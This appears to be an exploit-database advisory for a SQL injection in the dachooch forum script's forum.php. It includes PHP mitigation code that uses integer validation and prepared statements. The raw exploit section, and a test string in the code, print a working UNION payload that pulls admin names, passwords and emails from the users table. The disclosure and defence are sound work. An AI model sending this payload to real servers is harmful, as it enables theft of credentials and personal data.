Vendor: dachooch
By: Snakespc
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: dachooch
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Dachooch Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to forum.php on the vulnerable server. In the published request, the thread parameter carries a UNION statement that is appended to the original query. The injected statement lets the attacker extract data from the database, such as usernames, passwords, and email addresses from the users table.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
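One way to apply this to the forum.php parameters that appear in the exploit URL, as an added example rather than dachooch's own code. The helper names, the posts table and its columns, the use of PDO, and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Hypothetical helper: accept an ID parameter only if it is a non-negative integer.
function int_param(array $query, string $name): int
{
    $value = filter_var($query[$name] ?? null, FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 0]]);
    if ($value === false) {
        throw new InvalidArgumentException("invalid parameter: $name");
    }
    return $value;
}

// Hypothetical query: the posts table and its columns are assumptions.
function fetch_thread_posts(PDO $db, array $query): array
{
    $stmt = $db->prepare(
        'SELECT id, title, body FROM posts WHERE thread_id = :thread AND group_id = :grp'
    );
    // Bound values travel separately from the SQL text and cannot change its structure.
    $stmt->bindValue(':thread', int_param($query, 'thread'), PDO::PARAM_INT);
    $stmt->bindValue(':grp', int_param($query, 'group'), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory SQLite database (stand-in for the real one).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, thread_id INTEGER,
           group_id INTEGER, title TEXT, body TEXT)');
$db->exec("INSERT INTO posts (thread_id, group_id, title, body) VALUES (3, 3, 'hello', 'first post')");

// First request is benign; second carries the thread value from the advisory.
$requests = [
    ['mid' => '3', 'smid' => '0', 'group' => '3', 'thread' => '3'],
    ['mid' => '3', 'smid' => '0', 'group' => '3', 'thread' =>
        '-3 UNION all SELECT 1,2,unhex(hex(group_concat(admin,0x3a,pass,0x3a,email))),'
        . 'CHAR(115, 101, 99, 45, 119, 97, 114),5,6 from users--'],
];

foreach ($requests as $q) {
    try {
        printf("accepted: %d row(s)\n", count(fetch_thread_posts($db, $q)));
    } catch (InvalidArgumentException $e) {
        // A real handler would answer with HTTP 400 and log the request.
        printf("rejected: %s\n", $e->getMessage());
    }
}
```

The integer check rejects the advisory's thread value before any SQL runs, and the bound placeholders mean that a value which did pass validation would still be handled as data rather than as query text.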

Exploit-DB raw data:

==============================================================================
[»] Dachooch Remote Sql Injection Vulnerability
==============================================================================
  
[»] Script:   [dachooch ]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
[»] Note:     [ Hna Rana Fi South Africa (Coupe du monde)  ]
  
###########################################################################
 ===[ Exploit ]=== 
  
[»] http://server/forum.php?mid=3&smid=0&group=3&thread=-3+UNION all SELECT 1,2,unhex(hex(group_concat(admin,0x3a,pass,0x3a,email))),CHAR(115, 101, 99, 45, 119, 97, 114),5,6+from+users--
[»]Author: Snakespc <-
###########################################################################